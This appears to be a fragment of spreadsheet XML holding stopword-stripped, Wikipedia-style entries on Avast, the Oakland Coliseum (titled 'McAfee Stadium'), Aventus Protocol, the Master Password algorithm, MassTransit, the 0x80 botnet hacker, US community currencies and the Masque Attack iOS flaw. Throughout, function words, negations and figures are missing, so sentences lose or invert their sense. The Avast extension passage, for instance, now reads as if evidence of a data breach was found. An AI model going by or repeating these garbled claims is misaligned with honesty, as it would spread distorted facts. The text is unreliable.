unnecessary files hard drive, find secure wireless networks create connection internet.avast consumer security software sold freemium model, basic security features free, advanced features require purchasing premium version. free version also supported ads. additionally, avast users provide data mobile device avast, used identify security threats. antivirus scanning, browser cleanup, secure browser, password management, network security features provided free, firewall, anti-spam, online banking features purchased. according pro, software "nag" users upgrading. about avast's users premium version (10% us).the avast business product family includes features endpoint protection, wi-fi security, antivirus, identity protection, password management, data protection. example, desktop product look vulnerabilities wi-fi network applications suspect malicious software isolated sandbox. avast business managed workplace monitors manages desktops, assesses on-site security protocols. company also sells management software administrators deploy manage avast installations. reception magazine gave avast free antivirus software overall score gave avg, purchased avast 2016, score plus "avg antivirus free offers precisely virus protection engine avast free antivirus, lacks impressive collection additional features avast." tests conducted av-test institute august 2021, avast received points protection usability, points performance. review tom's guide says free avast antivirus product "good protection malware" takes little space system. review says avast competitive features free antivirus product, scans sometimes fast.the avast antivirus product business users received techradar 2017. review said software good features, protection, configuration "excellent interface", took hard disk space cover mobile devices. according tom's guide, mobile version inexpensive packed features. magazine said mobile version "has almost security features could want."avg also generally performed well tests. review tom's hardware gave software seven stars. review highlighted software small system footprint good malware protection, quick scan option lacks many additional features. collection sale user data late 2019, avast browser extensions found collect user data, including browsing behavior history, send remote server. discovery extensions avast brands temporarily removed google chrome, firefox opera extension stores, however, returned short time later concrete evidence demonstrated breach private data users.in january 2020, joint investigation motherboard pcmag found avast antivirus antivirus free version collecting user data, resold personalize advertising subsidiary, jumpshot. leaked documents showed jumpshot offered provide customers "every search. every click. every site." million compromised devices. response, avast announced january 2020, would immediately shut jumpshot cease operations backlash users' data privacy.on basis information revealed, february 2020 czech office personal data protection announced initiated preliminary investigation. also comparison antivirus software comparison firewalls references external links official website</t>
  </si>
  <si>
    <t>McAfee Stadium</t>
  </si>
  <si>
    <t>oakland coliseum, currently branded ringcentral coliseum, stadium oakland, california. part oakland–alameda county coliseum complex, adjacent oakland arena, near interstate 880. coliseum home ballpark oakland athletics major league baseball. 2017, playing surface dedicated rickey henderson field honor major league baseball hall famer former athletics left fielder rickey henderson.as multi-purpose stadium, former home oakland raiders national football league 1966 1981 (when team moved angeles), 1995 2019 (when team moved vegas). since then, stadium primarily used baseball. last remaining stadium united states shared professional baseball football teams. also occasionally used soccer, including hosting selected jose earthquakes matches 2008 2009, 2009 concacaf gold cup.the coliseum seating capacity 63,132 depending configuration; upper deck dubbed "mount davis" fans added part 1996 renovation raiders' return oakland. 2006, citing desire provide "intimate" environment, athletics blocked entirety coliseum's third deck games, artificially limited capacity 34,077 (making smallest stadium major league baseball). 2013, raiders also began restrict mount davis nfl's blackout rules, reducing football capacity around 11,000. april 2017, dave kaval then-new team president, athletics began reopen sections third deck, open mount davis deck selected marquee games; configuration makes contrast, largest baseball stadium united states capacity. while venue, stadium second-smallest stadium, larger dignity health sports park, former temporary home angeles chargers. design coliseum features underground design playing surface ground level, feet (6.4 level. consequently, fans entering stadium find walking main concourse stadium first level seats. this, combined hill built around stadium create upper concourse, means third deck visible outside park. stadium history planning construction business political leaders oakland long competition neighboring francisco, well cities west, worked oakland greater east suburbs recognized nationally viable metropolitan area identity reputation, distinct separate francisco. professional sports seen primary east gain recognition. result, desire major league stadium city oakland intensified 1950s 1960s.by 1960, non-profit corporation formed oversee financing development facility rather city county government issuing taxpayer-backed bonds construction. local real estate developer robert nahas (who president oakland's chamber commerce) headed group, included prominent east business leaders former senator william knowland edgar kaiser, later became governing board coliseum upon completion. nahas' idea coliseum privately financed ownership transferring city county upon retirement construction financing.nahas served years president oakland–alameda county coliseum board. death nahas, jack maltester, former leandro mayor coliseum board member, said, nahas, would coliseum, really simple." nahas diplomat dealing egos raiders owner davis, athletics owner charles finley, warriors owner franklin mieuli. preliminary architectural plans unveiled november 1960, following month site chosen west elmhurst district east oakland alongside recently completed nimitz freeway. downtown site adjacent lake merritt oakland auditorium also originally considered. port oakland played role selection east oakland site. port gave acres head leandro east regional park district, exchange acres park land across freeway. port donated land city oakland site complex.the oakland raiders american football league moved frank youell field, makeshift stadium near downtown oakland, 1962, coliseum already heralded local media raiders' future permanent home. baseball also major factor planning coliseum. early 1961, american league publicly indicated wished include oakland west coast expansion plans. 1963, american league president cronin suggested coliseum officials model aspects ballpark dodger stadium, impressed him, though expansion plans seemed fade middle decade. after approval city oakland well alameda county 1962, million financing arranged. plans drawn stadium, indoor arena, exhibition hall them. architect record francisco office skidmore, owings merrill myron goldsmith principal design architect general contractor atkinson company. preliminary site preparation began summer 1961. construction began spring 1962. construction schedule delayed years various legal issues cost overruns; original design modified slightly stay within budget.in 1965, rumored cleveland indians might leave cleveland west coast city (such oakland), indians stayed cleveland. charlie finley, owner kansas city athletics, unhappy kansas city, impressed oakland's stadium personally convinced consider oakland nahas. after several unsuccessful attempts amid considerable controversy, finley eventually permission relocate athletics oakland 1968. year later, replacement, kansas city royals, began play expansion team. configurations baseball configuration, coliseum foul territory ballpark major league baseball. thus, many balls would reach seats ballparks caught outs coliseum. distance backstop initially feet reduced feet 1969. from 1968 1981 1995, football configurations used stadium. during raider preseason games regular season games played baseball season still going field home plate center field (east/west). seats foul lines baseball games became sideline seats football games, started feet away field (most football-only stadiums sideline seats start half distance away). once season ended, orientation switched north/south: i.e. football field left field line right field line; seats moved behind first third base create corners zone (these seats placed fill space normally behind home plate near foul poles baseball games). temporary football bleachers added front baseball bleachers form sideline east (visitors') side, baseball bleachers sold. raiders season ticket holders would thus season ticket locations different parts stadium roughly corresponded location relation field. after stadium expansion 1996, field north/south throughout season. seating capacity stadium name changes first three decades (1966–1998) stadium known oakland–alameda county coliseum.in september 1997, umax technologies agreed acquire naming rights stadium. however, following dispute, court decision reinstated oakland–alameda county coliseum name. 1998, network associates agreed us$5.8 million five years naming rights stadium became known network associates coliseum, alternately marketing media usage "the net".network associates renewed contract 2003 additional five years cost million. mid-2004, network associates renamed mcafee, restoring name 1997 merger network general, stadium renamed mcafee coliseum accordingly. mcafee offered renewal naming contract 2008, declined. name reverted pre-1997 name oakland–alameda county coliseum september 2008. stadium retained original name april 2011, renamed overstock.com coliseum six-year, $7.2 million naming rights deal online retailer overstock.com. coliseum renamed o.co coliseum june 2011, overstock.com's marketing name. however, contract dispute athletics regarding overstock/o.co naming rights deal, continued refer stadium oakland–alameda county coliseum official team communications team websites.overstock opted final year naming rights deal april 2016, stadium became oakland–alameda county coliseum.the athletics dedicated coliseum's playing surface "rickey henderson field" honor hall famer former athletic rickey henderson part opening april 2017.ringcentral placed naming rights 2019, million annual payment. oakland–alameda county coliseum authority gave approval naming-rights deal 2019 pending formal approval major league baseball. signage place time golden state warriors hosted 2019 finals neighboring oracle arena june 5.however, august 2019, head coliseum authority, scott mckibben, abruptly resigned position allegations emerged requested $50,000 ringcentral exchange negotiating naming rights deal. mckibben subsequently charged alameda county district attorney's office violating conflict-of-interest laws, including felony misdemeanor count. january 2020, ringcentral naming rights deal rescinded coliseum authority. late 2020, three year naming rights deal ringcentral agreed eventual replacements athletics athletics owner lewis wolff made first official proposal ballpark oakland oakland-alameda county coliseum authority august 2005. stadium would located across 66th avenue coliseum currently industrial area north coliseum. park would held 35,000 fans, making smallest park major leagues. plans oakland location fell early 2006 several owners land proposed ballpark decided sell. throughout 2006, athletics continued search ballpark site within designated territory alameda county. late 2006, rumors began circulate regarding 143-acre parcel land fremont site. these rumors confirmed fremont city council november year. wolff council present plan move fremont soon built ballpark named cisco field. wolff cisco systems conducted press conference jose-based headquarters cisco systems november 2006 confirm deal, showcase details future plan. however, february 2009, delays increased public opposition, athletics officially ended search stadium site fremont. athletics later took cisco field plan site downtown jose located near center (home nhl's jose sharks). jose plan opposed francisco giants whose territory jose october 2015, united states supreme court rejected jose's athletics.during time, city oakland continued propose ballpark ideas ranged proposal build waterfront site jack london square area called victory court three stadium proposal called coliseum city coliseum site. both plans went nowhere. athletics signed ten-year lease stay oakland coliseum july 2014. deal required team look stadium, city limits, made difficult raiders tear coliseum football-only facility. began talks architect august 2014, build baseball-only stadium coliseum site, according wolff.going 2016, john fisher took majority control team made dave kaval team president person charge stadium hunt. september 2017, announced site near laney college eastlake neighborhood chosen ballpark (tentatively called oakland ballpark) proposing construct 35,000 seat stadium site college's administrative buildings would relocate spot college's choosing. however, laney college board trustees abruptly ended talks athletics december 2017. surprised forced look alternatives stadium location.on november 2018, athletics announced team chosen build 34,000-seat ballpark howard terminal site, located miles west laney college port oakland. team also announced intent purchase coliseum site make technology housing hub, preserving oracle arena reducing coliseum low-rise sports park francisco kezar stadium.a turning point came spring 2021, commissioner manfred suggested look relocation another city howard terminal plans stalled. however, said remain committed staying oakland, continue efforts ballpark built. athletics coliseum redevelopment plan coliseum, along oracle arena surrounding parking lots, owned city oakland athletics. athletics purchased share 2018 alameda county, city oakland dropped lawsuit attempted block sale. july 2021, black-led redevelopment groups vying chance purchase city's half site, african american sports entertainment group dave stewart lonnie murray. november 2021, council voted move forward plan proposed african american sports entertainment group. raiders under replacement proposals, oakland raiders would presumably continued play football coliseum, although proposals raiders play levi's stadium, home francisco 49ers santa clara well rumors regarding raiders' possible return angeles.the raiders proposed 50,000-seat stadium spot coliseum 2013. would cost $800 million, $300 million coming raiders, $200 million coming nfl's stadium loan program, final $300 million coming city.after failure stadium plan, raiders owner mark davis officials city antonio july 2014, discuss moving raiders city time 2015 season; would temporarily played home games alamodome permanent stadium built. september 2014, city oakland claimed reached tentative deal build football stadium oakland, would resulted coliseum demolished. claim silence raiders, continued explore antonio, opposition alameda county.on february 2015, raiders diego chargers announced plans privately financed $1.7 billion stadium teams would built carson upon approved move angeles market. both teams said would continue attempt stadiums built respective cities. stadium approved carson city council defeated voted favor building sofi stadium relocating louis rams back angeles chargers second team. january 2016, mark davis vegas sands owner sheldon adelson building domed stadium unlv campus raiders unlv rebels. stadium location later moved site across interstate mandalay bay. after approval $750 million state nevada backing bank america adelson pulled project, raiders submitted papers relocation vegas january 2017, march 2017, raiders' relocation vegas approved. team planned continue play coliseum 2019 season relocate vegas 2020. december 2018, city oakland sued raiders teams millions unpaid debts financial damages, prompted raiders management declare team leaving 2018 season. after francisco 49ers blocked attempt raiders relocate oracle park 2019 season, raiders coliseum authority reached agreement principle february 2019 allow raiders return coliseum 2019 provision 2020 case completion vegas stadium delayed; coliseum authority approved lease march alameda county board supervisors oakland city council voted favor lease march respectively. january 2020, raiders officially moved vegas becoming vegas raiders. notable events 1960s november 1969 rolling stones performed shows stadium. bootleg recording show titled live'r than you'll ever raiders move raiders played first game stadium september 1966. 1968, kansas city athletics moved oakland began play stadium. athletics' first game played april 1968. stadium complex cost $25.5 million ($213 million adjusted inflation) build rests acres land. april 1968, boog powell first major league home history coliseum. year, catfish hunter pitched ninth perfect game major league history coliseum. coliseum hosted 1967 1969 championship games. additionally, venue hosted second match npsl final 1967. 1970s from 1970 1972 stadium hosted three college football benefit games featuring area schools versus historically black colleges.the coliseum hosted 1971 east–west shrine game january 1971. 1972, athletics first three straight world series championships first since years philadelphia. awkwardness baseball–football conversion, well seating capacity (around 54,000 football) prime seating east side consisted temporary bleachers raiders explore stadium options. option memorial stadium berkeley campus. several preseason games played early 1970s along regular season game 1973 12–7 victory miami dolphins september regular season going on). however, response traffic parking issues associated games (while games drew large number students live near campus walk games, raiders games attracted fans larger geographic area used tailgating coliseum likely drive games), city berkeley passed professional sports events license city collected gate receipts, making staging professional games inside city cost-prohibitive. raiders granted injunction city collecting tax, arguing regulatory measure rather revenue measure, therefore improper regulation land held trust regents university california. however, grant injunction reversed california court appeals, found revenue measure, despite fact city made measure immediately effective "due danger public peace, health, safety city berkeley result holding professional sports events there".the stadium well maintained late 1970s. condition noticeable baseball season, crowds games twice numbered fewer 1,000. april 1979, fans attended game versus seattle mariners. during time, popularly known "oakland mausoleum". 1980s 1980, raiders super bowl years later, raiders moved angeles, leaving remaining tenants oakland coliseum. only days later, finley agreed sell marvin davis, planned move denver. however, city county officials lose oakland's status major league city right, refused lease. finley sold team instead owners francisco-based levi strauss after 1986 major league baseball season, original scoreboards replaced. american sign indicator scoreboard message center installed behind left field bleachers, original right field scoreboard replaced manually operated out-of-town scoreboard. between centerfield flagpoles, diamond vision video screen installed.the 1987 major league baseball all-star game held stadium. from 1988 1990, venue three world series. 1989, athletics series since moving oakland, sweeping francisco giants earthquake-interrupted "battle bay" series. 1990s 1990s, several major concerts held, "days green", definition, occurred night.in july 1995, raiders agreed return oakland provided oakland coliseum underwent renovations. november 1995, renovations commenced continued next summer beginning 1996 football season (more info below). layout also somewhat peculiar effect creating inward outfield fence, left center right center. there three distance markers instead one, various points power alleys, indicated dimensions grid. raiders' return also heralded creation "black hole", highly recognizable group fans occupied zone seating football games. 2000s april 2006, broadcast booth renamed honor late bill king, legendary area sportscaster play-by-play voice a's, raiders warriors years.san jose earthquakes major league soccer, announced november 2007 would playing "big draw" games, featuring david beckham angeles galaxy, stadium instead then-home buck shaw stadium (capacity roughly 10,000) santa clara. since quakes moved home avaya stadium play bigger games nearby stanford stadium.midway decade, stadium established re-entry" policy. each ticket used once, second ticket must purchased order re-enter coliseum. 2010s 2010, almost years catfish hunter's perfect game, dallas braden pitched 19th perfect game major league history coliseum. commemorative graphic placed baseball outfield wall next rickey henderson's retired number next home game.with miami marlins opening ballpark 2012, stadium became last remaining venue united states hosted major league baseball national football league team.as part ten-year lease signed athletics oakland–alameda county coliseum authority 2014, oakland coliseum million scoreboard system (two large outfield scoreboards, feet tall feet wide, ribbon scoreboards) installed start 2015 season. also part lease, coliseum authority agreed million year, five percent annual increases, fund maintain stadium.for 2017 major league baseball season, tarp covering large amount baseball configuration removed, increasing capacity 47,000 first time since 1995. tarp remains football-only davis.from 2016 onward, invested heavily improvements coliseum. 2017 team created outdoor plaza area food trucks lawn games, called championship plaza. west side club also entirely renovated rebranded shibe park tavern (after former home park philadelphia), coliseum's destination restaurant twenty different beers tap. 2018, created brand destination indoor/outdoor concept left field corner called treehouse. treehouse brought demographic fans coliseum nightly themed discounts innovative subscription ticketing product, treehouse pass.on april 2018, athletics opened gates coliseum free admission game versus chicago white sox. 50th anniversary club's first game played oakland back april 1968. 46,028 fans hand 10–2 athletics victory kaval called game gift oakland".on december 2019, raiders played last scheduled game coliseum, losing jacksonville jaguars score 20–16, giving unanswered points second half. fans booed team exited field last time. 2020s september 2020, diego padres athletics played warmest game coliseum's history. game played 94-degree heat. concerts commencing 1973, stadium hosted annual green concert series, presented bill graham company bill graham presents, continued early 1990s.in january 1974, singer marvin gaye used stadium site comeback performance stage. acclaimed performance later released live album, marvin gaye live!. zeppelin played turned final north american concerts twin shows 1977 north american tour. following second show bill graham barred band venue managed venues response band's manager peter grant, drummer john bonham security 'co-ordinator' john bindon's brutal assault graham's security employees first show, following employee's refusal allow grant's 11-year-old warren take item belonging venue memorabilia. death plant's young karac three days later resulting cancellation remaining tour dates rendered graham's action academic.parliament-funkadelic brought p-funk earth tour coliseum january 1977. their performance recorded released double entitled live: p-funk earth tour. stadium played host amnesty international's human rights now! benefit concert september 1988. show headlined sting peter gabriel also featured bruce springsteen street band, tracy chapman, youssou n'dour, orbison joan baez.metallica guns roses brought guns roses/metallica stadium tour coliseum september 1992, body count opening act.u2 played nights june 1997 oakland coliseum part popmart tour. they supported oasis, first shows here tour.the stadium played host gigantour september 2006, featuring performances megadeth, lamb god, opeth, arch enemy, overkill, into eternity, sanctity smashup.u2 performed stadium 360° tour june 2011, lenny kravitz moonalice opening acts front 64,829 people. show originally scheduled take place june 2010, postponed, bono's emergency back surgery.on august 2017, green played homecoming concert coliseum. show part band's summer tour support third number album, revolution radio.the stadium hosted "bay area" edition large hip-hop music festival rolling loud 2018 '19. 2019 headliners included future, g-eazy, migos, vert. stadium holds distinction hosting concerts grateful dead shows 1979 1995.\ popular culture music video huey lewis news song "jacob's ladder" shot concert coliseum december 1986. richard marx shot video "take this heart" baseball field coliseum.the stadium location 1994 disney movie angels outfield. although angel stadium anaheim (known anaheim stadium time) angels actually played, damaged 1994 southern california earthquake. anaheim stadium used views outside aerial views, coliseum used interior shots.the coliseum also used scenes 2011 film moneyball.the climax novel there there tommy orange takes place coliseum. other events stadium hosted supercross championship round since 2011.the stadium also hosted monster event since 2008. international soccer matches criticism baseball recent years, coliseum criticized "worst stadiums baseball". instance, 2011, bleacher report named fifth-worst stadium majors, partly expansive foul territory. 2017 york times called coliseum bland, charmless concrete monstrosity" "isn't worthy preservation perhaps america's hated sports stadium".two years later, another times article, writer jack nicas defended coliseum criticism, argued perceived failings actually strengths. "yes, coliseum ugly, cheap, gritty fun," said. surprise, moving oakland four years earlier, come love coliseum much loved fenway park growing attending college boston, wrigley field moved chicago graduating college. parks baseball equivalent classic pubs, nicas wrote, "the coliseum baseball's last dive bar."as season ticket holder, nicas concessions half price, leading combined cost beer, deal doubted could matched anywhere else city. coliseum also spacious fenway wrigley, expansive foul territory fans distance also allowed opportunities great catches fielders. found fans appreciated coliseum offer and, like him, feared would lost ballpark, admitted virtues drawn enough spectators coliseum team justify remaining there. public debt 1996 expansion stadium funded controversial issuance—critics said "(oakland) raiders' late owner, davis, fleeced local officials expense taxpayers"—of $220 million public debt alameda county city oakland, resulting substantial debt service payments governments. spring 2018, city oakland still owed $135 million expansion.in december 2019, alameda county officials announced sale county's interest stadium oakland baseball club, saying million deal would allow county share debt. joint statement, supervisor scott haggerty supervisor nate miley noted supervisors "have negotiations played instrumental roles moving sale county's share forward hope that, finalized, million valuation relieve county debt weighed taxpayers decades." mount davis feature 1996 expansion addition 10,000 seats upper deck spans outfield baseball configuration, enclosing stadium. stands' height loss oakland hills view, fans derisively nicknamed structure "mount davis", late raiders owner davis. criticized area made oakland coliseum look ever like football stadium, baseball. from 1997 2005, opened part upper deck baseball, count part listed capacity; "official" capacity 43,962, "actual" capacity 55,945. 2006, athletics covered entire third deck tarp, reducing capacity 34,077—the smallest capacity time. even game otherwise sold out, would sell seats area. would remain covered except made world series. said closing upper deck would create "more intimate environment" baseball. this drew criticism fans, oakland city council, sports marketing analysts baffled owner wolff's decision, stating cover possible move jose (see cisco field). there 20,878 seats covered tarp would otherwise usable baseball.in february 2013, oakland raiders announced would cover 11,000 seats mount davis section tarp; reduced capacity 53,250, making coliseum smallest seating capacity final years league (league rules required minimum capacity 50,000, stadium, barring temporary-used dignity health sports park, seated fewer 61,000). this done order potentially allow raiders games televised locally, games blacked less tickets sold. under rules, tarps stay place season long, even playoffs.in 2017, team president dave kaval decided open several sections original third deck covered tarps, though mount davis stayed tarped. this increased capacity 12,103 47,170. athletics since occasionally removed tarp mount davis specific games, occasional bridge series games francisco giants, 2019 american league wild card game tampa rays. latter record attendance wild card game, 54,005. sewage june 2013, following game seattle mariners, coliseum experienced severe sewage backup. this pipes leaking puddles sewage showers, offices, visitor training room storage areas clubhouse level stadium, feet (0.91 level. after game, mariners forced share oakland raiders locker room, located stadium's second floor. according coliseum officials, stadium's aging plumbing system overtaxed six-game homestand drew close baseball capacity crowds totaling 171,756 fans.this first time sewage problems cropped stadium. occasion, angeles angels complained coli visiting team's training room backup. backups occur even events taking place there. instance, wolff wanted dinner june 2013 (while road) coliseum's restaurants, discover food service halted sewage leak kitchen. also sports francisco area references external links official oakland coliseum website county coliseum_coliseum.htm visit oakland–alameda county coliseum history oakland–alameda county coliseum coliseum mlb.com footballgeography.com: college football oakland coliseum youtube.com: time-lapse video conversion seating arrangement</t>
  </si>
  <si>
    <t>Aventus Protocol</t>
  </si>
  <si>
    <t>aventus protocol open standard event ticketing platform based blockchain. protocol first outlined annika monari alan 2016 white paper. 2015 studying master's degrees imperial college, london. they co-founders directors aventus protocol foundation oversees aventus systems, company running protocol.the aventus protocol based ethereum blockchain technology crypto token aventus token (avt). project funded rounds. first private pre-sale then, september 2017, initial coin offering. initial funding reportedly million, including 60,000 ether raised.the protocol creates unique identity ticket stored public blockchain. each transaction involving ticket likewise recorded publicly. monari stated white paper protocol tool combat counterfeit tickets, uncontrolled resale, opaque pricing.the aventus protocol used tickets sold 2018 fifa world russia. references</t>
  </si>
  <si>
    <t>Master Password (algorithm)</t>
  </si>
  <si>
    <t>master password type algorithm first implemented maarten billemont creating unique passwords reproducible manner. differs traditional password managers passwords stored disk cloud, regenerated every time information entered user: their name, master password, unique identifier service password intended (usually url).by storing passwords anywhere, approach makes harder attackers steal intercept them. also removes need synchronization devices, backups potential password databases risks data breach. this sometimes called sync-less password management. algorithm billemont's implementation involves following parameters: name: username, used salt. user's full name chosen provides sufficiently high level entropy unlikely forgotten. master_password: secret generating master key. site_name: unique name service password intended for. usually bare domain name. counter: integer incremented service requests password. default, password_type: password type defines length constitution resulting password, below. master generation billemont's implementation, master global 64-byte secret generated user's secret master password salted full name. salt used avoid attacks based rainbow tables. scrypt algorithm, intentionally slow derivation function, used generating master make brute-force attack infeasible. template seed generation template seed site-specific secret binary form, generated master key, site name counter using hmac-sha256 algorithm. later converted character string using password templates. template seed makes every password unique website user. password generation binary template seed converted available password types. default type maximum security password, others selected service's password policy allow passwords format: maximum security password ascii printable characters) long password ascii printable characters) medium password ascii printable characters) short password ascii printable characters) basic password alphanumeric characters) digits) implementations billemont also created multiple free software implementations master password algorithm, licensed gplv3.: ios. implementation first released 2012. android graphical desktop application written java command-line application written browser plugin firefox chromium-based browsers client written javascript. references external links official website</t>
  </si>
  <si>
    <t>MassTransit Enterprise</t>
  </si>
  <si>
    <t>masstransit enterprise, managed file transfer server grouplogic, inc, (arlington, virginia, usa), runs windows macintosh operating systems provides range managed file transfer functions. masstransit originally released adobe virtual network 1995. masstransit capabilities masstransit supports number tcp/ip based file transfer protocols including http, https, ftp, sftp, optimized proprietary protocol mtap, secure version mtap well data transport version mtap based user datagram protocol (udp). masstransit server (masstransit.exe) requires windows supports windows server 2008 (r2, 32-bit 64-bit) windows 2003 server. active directory users groups control access transfer reporting capabilities. masstransit release history masstransit september 2014 masstransit february 2014 masstransit 7.2.7 august 2012 masstransit 7.2.6 march 2012 masstransit 7.2.5 april 2012 masstransit 7.2.4 november 2011 masstransit 7.2.3 june 2011 masstransit 7.0.0 july 2010 masstransit 6.1.1 december 2009 masstransit november 2009 masstransit 6.0.1x04 december 2008 masstransit windows november 2008. masstransit 5.1.2 fixes windows march july 2008. masstransit 5.1.1 fixes windows february 2008. masstransit 9/10/2007 windows. masstransit 5.0.2 fixes windows january august 2007. masstransit 5.0.1 november 2006. masstransit masstransit 4.5.1 series fixes april 2004 march 2006. masstransit released adobe virtual network april 1996 references observer interviews group logic businessweek private company information: group logic, inc. issues managed file transfer, 2009 february 2009 id:g00165299 moving beyond file services 2009 id:g00168386 data encryption enough prevent credential theft july 2009 id:g00169584 hype cycle data application security, 2009 july 2009 id:g00168605 external links company website enterprise desktop alliance website apple solutions guide microsoft solutions directory</t>
  </si>
  <si>
    <t>0x80</t>
  </si>
  <si>
    <t>0x80 hacker interviewed brian krebs washington post lucrative business running "botnets", networks remotely controlled personal computers without owner's consent. article 2006 february washington post detailed 0x80's earnings around $6,800 month infecting controlled personal computers adware spyware exchange per-computer commission. leaked data 0x80 agreed interviewed post article condition he'd identified name home town.after link article slashdot, reader used iptc information encoded image learn roland, oklahoma entered picture's location. washington post removed images site commented know take obligations sources seriously want comment speculation sources" response interview question asking "are aware post failed scrub metadata images used article, leaving information town?" (question text edited washington post remove specific referenced town name). references external links washington post article slashdot comments exposing image metadata post blog victims 0x80 hacking</t>
  </si>
  <si>
    <t>List of community currencies in the United States</t>
  </si>
  <si>
    <t>community currencies used united states: models local currency local exchange trading systems (lets) time-based currency currencies intra-company barter network interstate blue money brattleboro, vermont, chesterfield, hampshire delaware, pennsylvania, maryland, jersey disney dollar disneyland disney world fourth corner exchange pacific northwest riverhours columbia river gorge (inactive) potomacs (started: 2009) location: washington, d.c., suburbs northern virginia maryland currencies state arkansas local trade partners (started: 2009) hybrid local currency bartering; fayetteville, arkansas arizona arizona dollars dewey, arizona (inactive) tucson time traders tucson, arizona california barter bucks concord, california bucks francisco, california berkeley barter network berkeley, california berkeley bread berkeley, california central pound clovis, california davis dollars davis, california escondido dollars escondido, california fairbuck fairfax, california (2011–2016) humboldt hours eureka, california, arcata, california mendocino seed fort bragg, california north fork shares north fork, california luis obispo hours luis obispo, california sand dollars bolinas, california santa monica hours santa monica, california sequoia hours garberville, california sonoma county community cash santa rosa, california trademarket nevada city, california ukiah hours ukiah, california colorado butte bucks crested butte, colorado carbondale spuds carbondale, colorado (inactive) community cash durango, colorado (inactive) noco hours fort collins, greeley, loveland, colorado (inactive) north fork helping hands paonia, colorado (inactive) mountain hours breckenridge, colorado (2012 current) mile high hours denver, colorado (2012 current) peak hours colorado springs, colorado (2012 current) connecticut bristol bucks bristol, connecticut (2021 current) middletown cash middletown, connecticut, wesleyan university thread city bread willimantic, connecticut (inactive) florida clear water hours tampa, florida (2012 current) (inactive) tampanio tampa, florida proposed currency based berkshares model tampa, florida surrounding communities) (inactive) georgia atlanta hours atlanta, georgia (inactive) hawai'i aloha hours hawaii, (2013 current) kauai barter trade network kilauea, hawaii idaho boise hours boise, idaho (inactive) labor backed economy boise, idaho (inactive) illinois white rabbit money (downstate illinois) indiana bloominghours bloomington, indiana iowa wash bucks sioux city, iowa kansas real dollars lawrence, kansas (inactive) kentucky berea bucks berea, kentucky (inactive) louisiana money orleans, louisiana (inactive) money dollars lafayette, louisiana crescents (started: 2004) orleans maine waldo hours unity, maine (inactive) maryland anacostia hours mount rainier, maryland (inactive) baltimore hours baltimore, maryland (inactive) p.e.n. neighborhood exchange takoma park, maryland (inactive) bnote baltimore, maryland massachusetts amesbury hours amesbury, massachusetts (inactive) berkshares (2006) southern berkshires, massachusetts cape dollars gloucester, massachusetts (inactive) valley dollars greenfield, massachusetts (inactive) michigan bucks (started 2006) traverse city, michigan chamber bucks sault sainte marie, michigan detroit cheers detroit, michigan (inactive) hollandollars holland, michigan (being discontinued honored local chamber commerce) minnesota hero dollar minneapolis, minnesota houston bucks houston, minnesota missouri chamber bucks maryville, missouri kansas city barter bucks kansas city, missouri (inactive) marbles columbia, missouri (inactive) hermann bucks hermann, missouri trounce saint louis, missouri montana missoula hours missoula, montana (inactive) nebraska shamrock dollars o’neill, nebraska cozad cash cozad, nebraska nevada goldback statewide hampshire shire silver goldback statewide jersey duckbills (stevens institute technology). hoboken, mexico santa hours santa mexico (inactive) york brooklyn torches (underdevelopment 2012) brooklyn, particle notes glens falls, york hudson valley current kingston, york ithaca hours (1991) ithaca, york ithacash ithaca dollars ithaca, york north carolina asheville lets credits asheville, north carolina (inactive) bull city bucks durham, north carolina (inactive) earthaven leaps earthaven ecovillage mountain money mars hill, north carolina (inactive) plenty pittsboro, north carolina ohio cuyahoga hours cleveland, ohio (inactive) portage hours kent, ohio (inactive) simply hours columbus, ohio (inactive) summit hours akron, ohio (inactive) wooster hours apple creek, ohio (inactive) oklahoma tulsa hours tulsa, oklahoma (inactive) oregon bridgetown bucks currency corp, portland (inactive) cascadia hour exchange (1993) portland columbia community exchange, columbia county gorge local currency cooperative, hood river jefferson rounds, coos, curry, douglas, klamath, lake, jackson, josephine counties hour exchange, corvallis timebank, portland reedville free exchange, reedville xchange stewards, portland pennsylvania lehigh valley barter hours bethlehem, pennsylvania (inactive) timebank media, initiative transition town media. media, pennsylvania equal dollars (1996) philadelphia downtown dollars (started: 2010) ardmore akio lira drumore, pennsylvania south dakota brookings bucks brookings, south dakota hobo dough south dakota state university, brookings, south dakota tennessee riverbend tokens chattanooga, tennessee (inactive) texas greyhound bucks taft, texas (inactive) houston hours houston, texas c-city cash colorado city, texas utah goldback statewide vermont bristol bucks bristol, vermont buffalo mountain hours hardwick, vermont (inactive) burlington bread burlington, vermont (inactive) green mountain hours montpelier, vermont (inactive) middlebury money middlebury, vermont vergennes green vergennes, vermont virginia floyd hours floyd, virginia (inactive) washington bainbridge island bucks bainbridge island, washington website found—outdated?) (inactive) bizx seattle, washington timebanks puget sound kirkland, fourth corner exchange washington, oregon, colorado, mexico, ohio, california kettle river hours kettle falls, washington website found—outdated?) (inactive) kitsap hours bremerton, washington website found—outdated?) lopez island hours lopez island, washington website found—outdated?) (inactive) skagit dollars mount vernon, washington website found—outdated?) (inactive) snohomish diamonds snohomish, washington sound hours, olympia (inactive) swel timebank shoreline, washington tenino wooden dollars, tenino, washington life dollars (started: 2004) mostly electronic printed bills; bellingham seattle wisconsin chamber bucks claire, wisconsin madison hours madison, wisconsin milwaukee hours milwaukee, wisconsin (inactive) wyoming goldback statewide also barter complementary currency local currency list canadian community currencies references</t>
  </si>
  <si>
    <t>Masque Attack</t>
  </si>
  <si>
    <t>masque attack name vulnerability identified named computer security company fireeye july 2014. fireeye privately informed apple inc. issue july 2014 disclosed vulnerability public november 2014 blog post website. vulnerability identified exist 7.1.1, 7.1.2, 8.0, 8.1.1 beta, jailbroken non-jailbroken devices. vulnerability consists getting users download install apps deceptively created bundle identifier existing legitimate app. deceptive replace pose legitimate app, long pre-installed along (i.e., default apple apps) thus, reason fireeye gave naming vulnerability "masque attack".once deceptive installed, malicious parties access data entered user, account credentials.on november 2014, united states computer emergency readiness team (us-cert, part department homeland security) released alert bulletin ta14-317a, regarding masque attack.apple stated november aware incidents customers affected attack. references</t>
  </si>
  <si>
    <t>Axact</t>
  </si>
  <si>
